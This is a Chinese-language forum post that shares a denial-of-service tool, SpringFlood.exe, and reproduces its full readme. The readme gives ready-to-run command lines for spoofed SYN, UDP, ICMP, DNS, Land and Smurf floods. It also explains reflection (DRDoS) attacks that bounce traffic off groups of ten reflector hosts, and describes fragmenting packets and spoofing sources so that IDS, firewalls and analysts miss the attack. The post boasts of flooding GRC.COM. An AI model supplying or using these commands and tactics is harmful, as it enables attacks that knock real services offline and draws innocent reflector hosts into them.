一台机器上面发现的d0s flood kit 貌似很强大 附readme
解压缩密码123
SpringFlood.exe已经做了优化平均速率为每秒1万到2万.并且能够通过你自几对tcp/ip等的专业知识,来制定Flood报文..........
而使得分析人员,更难辩认'攻击原'或'攻击平台',攻击数量等.........................................................
并且对那些tcp/ip报文健全过滤的设备做了'反过率'的防范.并且有效的避免了无效攻击包的产生..........................
避开了下列internet中无效的ip段:"0.0.0.0-0.255.255.255","10.0.0.0-10.255.255.255","127.0.0.0-127.255.255.255"
"167.254.0.0-167.255.255.255","172.16.0.0-172.255.255.255","192.168.0.0-192.168.255.255",及大于223.0.0.0的报文.
你想深入些了解D.O.S吗?当你能熟连操作SpringFlood.exe并且认真分析那些攻击报文及协议后,你会知到更多..................
! 一. SpringFlood.exe用法:(时间单为:分钟)
首先说明:SpringFlood.exe不但是个超级DDOS工具,结合sniffer用,她甚至也可以用做扫描探测,辩别操作系统,
比如对打过sp3的win2000发syn包,她将会回复给你一个64240的syn/ack的响应报文,而sp2将是16384左右等,
你向对方操作系统的一个不存在的udp断口发送一个携带数剧的udp包,比如大小为500 byte,win2000系统将只会复
给你56 byte(20+8+2的icmp(3,3)报文,而某些*nix类系统将回复给你你所发送的所有数据,等等等等..........
SpringFlood.exe结合sniffer用,甚至可以辩别操作系统.hehe..............
辩别操作系统可以让你自几构造flood包.本来想加入一些仿solairs和x86/bsd,linux的发的包的公能,为了更迷惑安全
分析人员,使之更难辩认'攻击原','攻击平台',攻击数量等.还有一些可有可无的工能,比如域名到ip转换等,但我累了,不想加了.
win2000的tos位,不能在spoofing ip的flooder里有效设置,唯一和tos有关的设置方法是在用icmp.dll的icmp报文中,可以设置tos标帜位
为7(高可信度),8(高吞吐量),10(低延时)等,而且要加入[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DisableUserTOSSetting"=dword:00000000,项后才能打开2000的tos位,win2000默认没有打开tos.所以你用ping的-v参数时是无效的......
但在做flooder时用到RAW_SOCK,随然可以setsockopt,并且能够在手工指定后仍然顺利,但不有效.
qos编程可以替换tos位,但无法用在flooder报文里.(至少现在我觉的没什麽办法了,所以一些flooder只能在*nix下做,如果你能做到,那太谢谢你了,请指教....hehe..........)
!->>>用法举例:
输入: C:\>SpringFlood.exe 3 1 192.168.0.188 0.0.0.1 64 4 2
(这就是一次'IP-Header' flood DoS攻击)
输入: C:\>SpringFlood.exe 4 1 192.168.0.188 0.0.0.1 0 8 0 1508 2
(这就是一次分段大报文的 'PING' flood DoS攻击)
输入: C:\>SpringFlood.exe 4 1 192.168.0.188 192.168.0.24 64 8 0 1024 2
(这就是一次DF置位的数据包大小为1k的伪装成192.168.0.24的弱智 'FakePing' flood DoS攻击.//如果将ip改为广播ip192.168.0.255的话,就变成Smurf了.)
输入: C:\>SpringFlood.exe 4 1 192.168.0.188 0.0.0.1 32 8 0 1508 2
(这就是一次MF置位的总是分段的ICMP(8,0)报文 flood DoS攻击)
输入: C:\>SpringFlood.exe 5 1 192.168.0.188 0.0.0.1 64 3 2 2
(这就是一次目标不可达之协议不可达的ICMP(3,2) flood DoS攻击)
输入: C:\>SpringFlood.exe 5 1 192.168.0.188 61.24.0.0 64 255 255 2
(这就是一次伪装成61.24.x.x的ip段的协议及代码随机的ICMP(x,x) flood DoS攻击)
输入: C:\>SpringFlood.exe 6 1 192.168.0.188 0.0.0.1 64 13 0 2
(这就是一次DF置位的icmp(13,0)时间截请求的'TIME-Stream' flood DoS攻击)(在linux下,修该Tos字段为7,8或10后,因为她很能消耗对方的CPU时间,所以我管她叫TIME-stream.//hehe..)
输入: C:\>SpringFlood.exe 7 1 192.168.0.188 80 0.0.0.1 0 64 1024 2
(这就是一次DF置位的数据包大小为1k的UDP flood DoS攻击)
输入: C:\>SpringFlood.exe 8 1 192.168.0.188 53 0.0.0.1 53 2
(这就是一次对53端口的DNS flood DoS攻击)
输入: C:\>SpringFlood.exe 8 1 192.168.0.188 53 61.24.34.34 53 2
(这就是一次伪装成61.24.34.34的53端口对192.168.0.188的53端口的 'FakeDns' flood DoS攻击)
输入: C:\>SpringFlood.exe 9 1 192.168.0.188 80 0.0.0.1 80 1 0 2 2
(这就是一次'有经验'的典型的'SYN' flood DoS攻击)
输入: C:\>SpringFlood.exe 9 1 192.168.0.188 80 192.168.0.188 80 1 0 2 2
(这就是一次'Land' flood DoS攻击.//其实不过就是目标ip等于原ip的syn flood而已.)
输入: C:\>SpringFlood.exe 9 1 192.168.0.188 80 61.24.0.0 80 2 0 255 2
(这就是一次Tcp序列号和响应号都存在,并且含有MSS及SP,TCP-options的,tcp服务标帜位取随机的,伪装成61.24.x.x网段的80端口的TCP 'FlagsRandom' flood DoS攻击.)
输入: C:\>SpringFlood.exe 10 1 192.168.0.188 80 0.0.0.1 0 64 4 0 0 2 0 40 2
(这就是一次Tcp序列号和响应号都不存在且DF置位,tcp服务标帜位为NULL的,类Stream flood DoS攻击.)
输入: C:\>SpringFlood.exe 10 1 192.168.0.188 80 0.0.0.1 0 64 1 0 16 2 0 40 2
(这就是一次标准的原始的最早针对FreeBsd而定制的,(seq1,ack0)ACK置位的Stream flood DoS攻击.//由于Win2000的tos一节所述,win2000下flood报文的tos无法有效置位的原因,所以在此,也是和标准原始的*nix下stream的唯一区别,很遗憾...)
输入: C:\>SpringFlood.exe 10 1 192.168.0.188 80 0.0.0.1 0 64 2 0 49 2 1 40 2
(这就是一次ip头DF置位,Tcp序列号和响应号都存在,服务标帜位为Fin/Ack/Urg且UrgPoint随机的Tcp flood DoS攻击.)
输入: C:\>SpringFlood.exe 10 1 192.168.0.188 80 61.24.24.24 80 0 3 0 4 0 0 40 2
(这就是一次ip头分段位为0(off),Tcp序列号为0,响应号存在的窗口为0的,伪装成61.24.24.24的80端口的RST flood DoS攻击.)
输入: C:\>SpringFlood.exe 10 1 192.168.0.188 80 192.168.0.166 0 32 123456789 987654321 41 2 1 65500 2
(这就是一次ip头分段位为MF(这里将导制所有发送的报文将一直永远分段.),服务标帜位为Fin/Psh/Urg的,
Tcp序列号为123456789,响应号为987654321,UrgPoint位取随机的,大小为65500 byte的,
Tcp 大块报文的 tcp阻塞式 flood DoS攻击.//将MF改为OF即0,才有些效果,目地是以大块tcp来阻塞,而不是同常的icmp或udp.)
输入: C:\>SpringFlood.exe 10 1 192.168.0.188 80 0.0.0.1 0 0 1 0 34 1 0 1520 2
(这就是一次ip头分段位为0(off,//这种必需为0),服务标帜位为Syn/Urg的,大小为1520 byte(MTU+20)的
分片'SYN' flood DoS攻击.)//有的ids对TCP分段处里不好,你可以构造更多,自几去做.
TargetIp = 目标IP;
TargetPort = 目标IP端口;
SourceIp = 原IP; (输入0.0.0.1 = 随机,输入0.0.0.2" = 224.0.x.x(多播地址范围变化),输入"x.x.0.0"(x等于任意你要伪装的网段) = x.x.0-255.0-255(即:在你所输入的ip范围内做B类网段随机.比如:输入61.24.0.0,则SpringFlood.exe在61.24.0.0到61.24.255.255中取随机), 否则请输入指定源IP.)
SourcePort = 原Port;(输入0 = 随机,否责输入指定端口)
RHost = 反射主机;
RhostPort = 反射主机端口;
Ip->frag(十进制数输入) = [IP数据包头中的分段标帜位];
(Win2000下输入有效的Ip->frag值为:00[无任何置位,即OFF], 32[更多分段置位,即MF], 64[不分段置位,即DF], 96[不分段和更多分段同时置位,即MDF],
128[未使用置位,即Unused], 160[未使用和更多分段同时置位], 192[未使用和不分段分段同时置位], 224[未使用和更多分段和不分段分段同时置位]
注:在win2000/tcp/ip中,通常合法有效的置位为: 0或32或64)
Ip->proto(十进制数输入) = [IP数据包头中的协议选择];
(例如: 输入1=ICMP, 输入2=IGMP, 输入4=IP, 输入6=TCP, 输入11=UDP等.....更协议位,参见相关Sniffer,推鉴使用Iris).
(输入"255" = 在0,ICMP,IGMP,IP,TCP,UDP协议位中随机)
Tcp->seq(十进制数输入) = [Tcp数据包中的序列号];
(输入1="序列号有,响应号0",输入2="序列号有,响应号有",输入3="序列号0,响应号有",输入4="序列号0,响应号0",输入5=手动指定输入序列号及响应号)
Tcp->ack(十进制数输入) = [Tcp数据包中的响应号];
(只有在Tcp->seq中选择输入5时,Tcp->ack参数中输入的响应号才有效,否责输入0即可)
Tcp->flags(十进制数输入) = [Tcp数据包中标帜位];
(例如: 01=FIN,02=SYN,04=RST,08=PUSH,16=ACK,32=URG等,更多标置位,参见相关Sniffer,推鉴使用Iris,(在参数的输入中注意是十进制数),输入"255" = tcp标帜位随机.)
Tcp->Win(十进制数输入) = [Tcp数据包中的窗口位];
(例如:输入1=窗口使用常规的"初始窗口值",(比如Win2000系统网卡机器为16384,打过sp3的网卡机器为64240等)
输入2=窗口使用随机窗口值.
输入3=指定输入窗口值.
Tcp->urgpoint(十进制数输入) = [Tcp数据包中的UrgPoint位];
(例如:输入1=随机, 否责输入指定的值)
Icmp类型(十进制数输入) = [Icmp数据包的类型]; (输入255=在"有效的类型"值内随机)
Icmp代码(十进制数输入) = [Icmp数据包类型的代码]; (输入255 =在"有效的代码"值内随机)
PacketSize(十进制数输入) = [指定数据包大小];
Threads(十进制数输入) = [攻击的线程数];
(实际应用来看,多线程没有太大意义,除了使你的机器CPU占用更多外,不会提高多大力度,
除非你机器有很多CPU,且内存等配置及高,网落带宽资源及高的情况下,多线程才能体显出一些优势,
一般情况下,多线程没有太大意义{发送大块的udp或icmp报文时,比如1500,采用多线程才会体显出力度优势,但最好不要超过10线程,否则你的机器也扛不住.}
输入参数时最好为:1或2, 可输入的最大线程数为:100 .
什麽机器和网落要用100个线程???...你的'爱鸡'是'舒琪'吗??? he he he.....)
| DRDOS(反射)类 --Flood~~: |
|___________________________|
<>类型0:<DRDOS--Icmp> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp
Argv[4]:RHost1,Argv[5]:RHost2,Argv[6]:RHost3,Argv[7]:RHost4,Argv[8]:RHost5,Argv[9]:RHost6,Argv[10]:RHost7,Argv[11]:RHost8,Argv[12]:RHost9,Argv[13]:RHost10
Argv[14]:Icmp类型,("255" = 随机) Argv[15]:Icmp代码,("255" = 随机) Argv[16]acketSize数据包大小,按说明选择) Argv[17]:Threads(线程数)
<>类型1:<DRDOS--Dns> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:TargetPort
Argv[5]:RHost1,Argv[6]:RHost2,Argv[7]:RHost3,Argv[8]:RHost4,Argv[9]:RHost5,Argv[10]:RHost6,Argv[11]:RHost7,Argv[12]:RHost8,Argv[13]:RHost9,Argv[14]:RHost10
Argv[15]:RhostPort Argv[16]:Threads(线程数)
<>类型2:<DRDOS--Tcp> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:TargetPort
Argv[5]:RHost1,Argv[6]:RHost2,Argv[7]:RHost3,Argv[8]:RHost4,Argv[9]:RHost5,Argv[10]:RHost6,Argv[11]:RHost7,Argv[12]:RHost8,Argv[13]:RHost9,Argv[14]:RHost10
Argv[15]:RhostPort
Argv[16]:Tcp->seq(按说明选择) Argv[17]:Tcp->ack(按说明选择) Argv[18]:Tcp->flags("255" = 随机 ) Argv[19]:Threads(线程数)
==========================================================================================================================================================================================================
|--------------------------|
| IP-Header --Flood~~: |
|__________________________|
<>类型3:<IP-Header> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:SourceIp,("请认真参见上面说明" Argv[5]:Ip->frag(按说明选择) Argv[6]:Ip->proto,("255" = 随机)
Argv[7]:Threads(线程数)
==========================================================================================================================================================================================================
|--------------------------|
| ICMP类 --Flood~~: |
|__________________________|
<>类型4:<ICMP_D01T`> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:SourceIp("请认真参见上面说明" Argv[5]:Ip->frag(按说明选择) Argv[6]:Icmp类型,("255" = 随机) Argv[7]:Icmp代码,("255" = 随机)
Argv[8]acketSize数据包大小,按说明选择) Argv[9]:Threads(线程数)
<>类型5:<ICMP_unreachable(56)> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:SourceIp("请认真参见上面说明" Argv[5]:Ip->frag(按说明选择) Argv[6]:Icmp类型,("255" = 随机) Argv[7]:Icmp代码,("255" = 随机)
Argv[8]:Threads(线程数)
<>类型6:<ICMP_timestamp(40)> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:SourceIp("请认真参见上面说明" Argv[5]:Ip->frag(按说明选择) Argv[6]:Icmp类型,("255" = 随机) Argv[7]:Icmp代码,("255" = 随机)
Argv[8]:Threads(线程数)
=========================================================================================================================================================================================================
|--------------------------|
| UDP类 --Flood~~: |
|__________________________|
<>类型7:<UDP_D01T`> Flood~~~
(平均.7千/s,7m/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:TargetPort Argv[5]:SourceIp,("请认真参见上面说明" Argv[6]:SourcePort,("0" = 随机) Argv[7]:Ip->frag(按说明选择)
Argv[8]acketSize数据包大小,按说明选择) Argv[9]:Threads(线程数)
<>类型8:<DNS_Flood> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:TargetPort Argv[5]:SourceIp,("请认真参见上面说明" Argv[6]:SourcePort,("0" = 随机) Argv[7]:Threads(线程数)
|--------------------------|
| TCP类 --Flood~~: |
|__________________________|
<>类型9:<Syn |Stream |Land |FlagRandom> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:TargetPort Argv[5]:SourceIp("请认真参见上面说明" Argv[6]:SourcePort,("0" = 随机)
Argv[7]:Tcp->seq(按说明选择) Argv[8]:Tcp->ack(按说明选择) Argv[9]:Tcp->flags("255" = 随机 ) Argv[10]:Threads(线程数)
<>类型10:<TCP_D01T`> Flood~~~
(平均.1万-2万/s)
C:\>SpringFlood.exe Argv[1]类型 Argv[2]:时间 Argv[3]:TargetIp Argv[4]:TargetPort Argv[5]:SourceIp("请认真参见上面说明" Argv[6]:SourcePort,("0" = 随机)
Argv[7]:Ip->frag(按说明选择) Argv[8]:Tcp->seq(按说明选择) Argv[9]:Tcp->ack(按说明选择) Argv[10]:Tcp->flags("255" = 随机 ) Argv[11]:Tcp->Win(按说明选择) Argv[12]:Tcp->urgpoint(按说明选择)
Argv[13]acketSize数据包大小,按说明选择) Argv[14]:Threads(线程数)
! 一. 使用SpringFlood.exe的一些说明:
!!----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
~1.DRDOS(反射)类说明:
SpringFlood.exe里包括三种反射,其中把反射主机定在10台一组,较为合适,如果你的反射主机不够10台的话,你需要重复输入反射主机的ip,以补足参数,一个ip被你重复输入的越多,那麽对这个ip的反射主机发的包就越多,就意为着这个ip的反射主机所反射
到敌方的数据包就越多,所以如果你想让某些反射主机反射的包多于其它反射主机,你可以在10个反射参数中,重复输入你需要'多反射'的反射主机ip,(比如,经过探查,你发现A主机离敌方目标最近,越段越近的距离可以更有效的打击敌人,但要注意,一些网落
设备会过率掉他内部的ip...那麽你可以重复输入A主机的ip,以达到让A反射更多的数据包....当然如果你在10个反射主机参数中,都输入A的ip,那就等于所有报文都发向A了,这就等于是一对一的做反射了.)
一对一的反射和多对一的反射的区别在于:
a.一对一的反射是将所有报文都发向一台反射主机,这样反射主机的流量和网落资源一样会受到不好的影响,很容易成为被害主机,也很容易被监测到,这不是我们要做反射的目地.
b.一对多是好的选择.同样100个报文在一秒内由攻击端发向10台反射主机,约等于每一台反射主机收到大约10个报文,然后他们(10台反射主机)从不同的方向平均每台回复给了敌方目标大约10个报文,
跟剧10台反射主机的网落位置不同,他们有快有慢的将报文反射给敌方目标,但最终相加基本还是我们最初发的报文数量即100个。
一对多的好处在于,反射主机不会由于过大的流量,Firewall,ids等原因,把我们发出的报文过率掉,或反射主机本身受到威害,一对多的模式使的我们发的报文被相对平均的分散到了一组一组(SpringFlood.exe中10台一组)不同的反射主机上,但跟剧所选的协议数剧包
等等的不同会产生一些攻击效率的差异...最终会四面八方汇集到敌方目标,在大数量高密度的数剧频度下,四面八方汇集的反射报文一样用效且略显高明的把敌方淹没.......
c.一对多的反射的方法能够更好的躲过IDS,FIREWALL等的监测.
SpringFlood.exe里包括三种反射包括ICMP,UDP(DNS),TCP三大类.
icmp反射:最弱的就是我们可以用敌方ip发类型8,代码0的报文(就是ping啊.he),使得敌方ip收到众多四面八方类型0,代码0(就是ping后的回复.he)的反射报文,将其淹没.......
报文的大小你可以自几定,过大的报文当然占用带宽更大,但流量相对要小,而且一些网落设备会发现异常而过率掉你发的报文,现在一般网落的MTU=1500,当你发的报文等于MTU=1500时,因该是很慢的.你需要了解更多协议网落等的知识及试验,以达到有效的打击.(别装模做样的说这和smurf一样.he)
比如我们还可以用类型13,代码0的icmp报文(就是时间截请求),使得敌方ip收到众多四面八方类型14,代码0(就是时间截回复,40byet)的反射报文,将其淹没.......
要有更多创意还需要认真了解各种协议,网落细节节构等......动脑去想更多的攻击模型.
Udp(Dns)反射:这个是标准的dns查循报文(当然也可以做udp反射用),你可以用敌方dns的ip,向internet上众多的dns-53port发dns查循报文,使得敌方dns-53port收到众多四面八方的dns主机的回复,将其淹没.......
或是向经心挑选好的反射主机的udp关闭的端口,发送udp报文,使得敌方ip收到众多四面八方反射来的icmp"目地不可达"报文,将其淹没.......
注意:windows系统只会回复标准的56byte(20iphdr+4icmphdr+4未用+28引发错误的报文)的icmp报文,而其它一些系统会回复除了28字节引发错误的报文头之外的所有udp数据,也就是说,如果我们发送1000 byte的ucp报文到目标主机的一个不存在的port上,
那麽结果是:windows机器只回复56 byte(20iphdr+4icmphdr+4未用+28引发错误的报文)的icmp(3,3)报文,而其它一些系统会回复了我们发的整个报文长度即1000+20+4+4=1028 byte,在flood攻击中,但当然选择回复了1028 byte的主机了.
(如果你发了28 byte的报文,他能回好几k或更大的报文那就更好了,hehe,那有这种反射主机,快告诉我.hehe)
Tcp反射:这类多种多样,无法一一列举,需要你熟知tcp/ip网落结构等知识,不在基楚上多学习,不会玩出什麽花样儿的,(除了syn-flood还知到鸟啊?),he he.....
比如上次flood GRC.COM的是被四面八方众多的所淹没(淹没GRC.COM的那些route都是离grc.com很近,而且route的带宽,等),
同样我们可以随便向经心挑选好的反射主机的任意端口发syn报文,而非必要是存在的port,windows的机器将很合作的回复rst/ack报文,同理还有很多种.在大火力的情况下,同样可以将敌方淹没....(而且较好的避开监测等..)
syn/ack的反射要在syn初始报文中加options-MSS(最大段长度)和SP(大块数据允许),windows的机器将回复同样的48 byte的syn/ack报文,而如果不加,windows的机器只回复44 byte的syn/ack报文......等等等...
~2.ICMP类说明:
<ICMP_D01T`>是指你可以自几选择构造flood报文,包扩数锯包大小,icmp类型,代码等,输入255,SpringFlood.exe将在有效的类型,代码范围内取随机.跟具你对tcp/ip了解的程度,自几去做.(所以叫01T,hehe...)
<ICMP_unreachable(56)>是依照icmp不可达的报文格式所做,其它同上.
<ICMP_timestamp(40)>是依照icmp的时间截报文格式所做,要说明一点:win2000在收到icmp(13,0)的报文时,会热烈的操作计算icmp(13,0)报文,在高频度的ddos应用中能发挥很好的效果,即使在lan里,用SpringFlood.exe的这种类型打击目标,对方会立即cpu过高利用,
我发现win2000(其它系统没有test.)对icmp(13,0)的报文热烈的操作计算所产生的超高cpu利用率的打击效果,很明显.
(将tos该为8或10后,这种方式我管它叫--"time-stream"(win2000,spoofing ip时不能修该tos字段,所以我写了个在linux下的,我管它叫--"time-stream"
~3.UDP类说明:
<UDP_D01T`>是指你可以自几选择构造flood报文,包扩数锯包大小, Ip分段标帜位等,其它同上.
注意:当数据包大小,大于网落的MTU时(一般,MTU=1500),不能输入'64'(即Ip->frag不能设置DF).~否则无法发出数据包,Tcp/ip协议失效.........~
<DNS_Flood>是以每秒1万到2万的速度发送dns标准请求报文到目标主机,目地是瘫患其Dns,使其无法解析域名.(你喜欢用ip访问吗?he he...)
~TCP类说明:
<Syn |Stream |Land |FlagRandom>可输入的参数包括:序列号,响应号,tcp服务标志位等.跟剧你的输入参数的不同,可以产生很多类攻击tcp报文,
包括经过优化而且'狡猾老练'的Syn flood,和stream flood,随机的tcp服务标志位即:FlagRandom,
和被某些傻x不停玄耀的最傻x弱智的攻击方式--land等等.(操..he he)
<TCP_D01T`>这是要说的,这里,你可以自几选择构造flood报文,可输入的参数全面众多,是给"明白人"玩的,
包扩ip头的分段标置位,tcp头的序列号,响应号,tcp服务标志位,窗口,UrgPoint等....
你想的flood,在这里,自几做......
当然也包括什麽syn flood等等了........
这些方式(比如:syn flood,land等)只不过是一个名子罢了,没什麽巨大的区别,
<TCP_D01T`>里你能做出所有那些flood类型.
像被某些傻x不停玄耀的最傻x弱智的攻击方式--land其时就是syn指定原ip为目标ip. fukc you...hehe..
一些ids等对Tcp分段后的检测防范上存在弱点等.我们可以利用这一点。
比如:同样是syn报文,我们可以指定长度为1520,这样就分段了,常归第一段应该是1500,也就是MTU的值,第二段为40,
(20iphdr+剩于的20 byte的数剧),最终在目标网落重组为一个syn报文,一样达到syn flood的作用,这只是简单说,跟剧
不同情形,还要考率其它因素等,将敌方淹没....
~3.其它类说明:
<IP-Header>是一个单独的ip头,20 byte, 可以同过输入参数proto来改变IP头的协议位,输入255等于在icmp,igmp,udp.tcp,0这几种协议中取随机,及ip分段标帜位等,
熟入0.0.0.2等于随机取多播地址即:224.0.x.x,具体参见用法.
一个数剧包的长度越小,其速度越快,做这个类型的一个原因是只用各种ip头做flood的测试......
还有一些tcp类"握手"后的类型,等在以后生级扩展时加入............
附件: 您所在的用户组无法下载或查看附件
